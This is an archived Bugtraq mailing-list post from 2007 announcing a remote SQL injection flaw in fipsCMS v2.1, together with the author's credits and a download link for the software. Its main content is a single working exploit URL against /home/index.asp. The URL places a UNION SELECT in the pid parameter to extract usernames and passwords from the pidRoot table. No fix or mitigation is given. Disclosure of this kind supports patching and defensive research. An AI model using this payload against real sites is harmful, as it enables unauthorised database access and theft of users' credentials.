bugtraq
[Top] [All Lists]

fipsCMS v2.1 Remote SQL injection Vulnerability

To: bugtraq@securityfocus.com
Subject: fipsCMS v2.1 Remote SQL injection Vulnerability
From: ilkerkandemir@mynet.com
Date: 6 May 2007 16:11:46 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # # #

# fipsCMS v2.1 Remote SQL injection Vulnerability  //  AYYILDIZ.ORG Gururla 
Sunar ...

# Script: fipsCMS v2.1

# Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0

# Author: iLker Kandemir <ilkerkandemir@mynet.com>

# ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # # #

#
  
# Exploit:

# 
/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/

#

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # #

<Prev in Thread] Current Thread [Next in Thread>
  • fipsCMS v2.1 Remote SQL injection Vulnerability, ilkerkandemir <=